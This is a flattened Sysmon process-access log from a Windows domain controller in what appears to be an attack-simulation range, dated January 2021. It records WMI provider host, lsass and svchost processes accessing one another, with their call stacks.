16:03:35.499{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029524Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:35.499{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029523Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:35.499{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029522Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:35.499{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029521Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:35.499{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029520Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:35.499{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029519Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:35.499{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029518Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:35.499{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029517Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:35.499{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029516Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:35.499{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029515Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:35.499{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029514Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:35.499{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-5457-6008-BC06-00000000A301}8012C:\Windows\system32\wbem\wmiprvse.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029513Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:35.499{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-5457-6008-BC06-00000000A301}8012C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029512Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:35.468{7901BC46-4987-6008-1600-00000000A301}15367136C:\Windows\system32\svchost.exe{7901BC46-5457-6008-BC06-00000000A301}8012C:\Windows\system32\wbem\wmiprvse.exe0x101541C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+20fee|C:\Windows\system32\wbem\wmiprvsd.dll+43f7|C:\Windows\system32\wbem\wmiprvsd.dll+15538|C:\Windows\system32\wbem\wmiprvsd.dll+1498a|C:\Windows\system32\wbem\wmiprvsd.dll+146e6|C:\Windows\system32\wbem\wmiprvsd.dll+140fe|C:\Windows\system32\wbem\wbemcore.dll+b920|C:\Windows\system32\wbem\wbemcore.dll+255ff|C:\Windows\system32\wbem\wbemcore.dll+24a9a|C:\Windows\system32\wbem\wbemcore.dll+2485e|C:\Windows\system32\wbem\wbemcore.dll+2685b|C:\Windows\system32\wbem\wbemcore.dll+22b78|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029511Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:35.452{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-5457-6008-BC06-00000000A301}8012C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029510Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:35.437{7901BC46-4984-6008-0500-00000000A301}640656C:\Windows\system32\csrss.exe{7901BC46-5457-6008-BC06-00000000A301}8012C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000029509Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:35.437{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-5457-6008-BC06-00000000A301}8012C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029508Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:35.437{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029507Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:35.437{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029506Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:35.437{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029708Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.796{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5457-6008-BF06-00000000A301}5556C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029707Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.796{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5457-6008-BE06-00000000A301}1228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029706Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 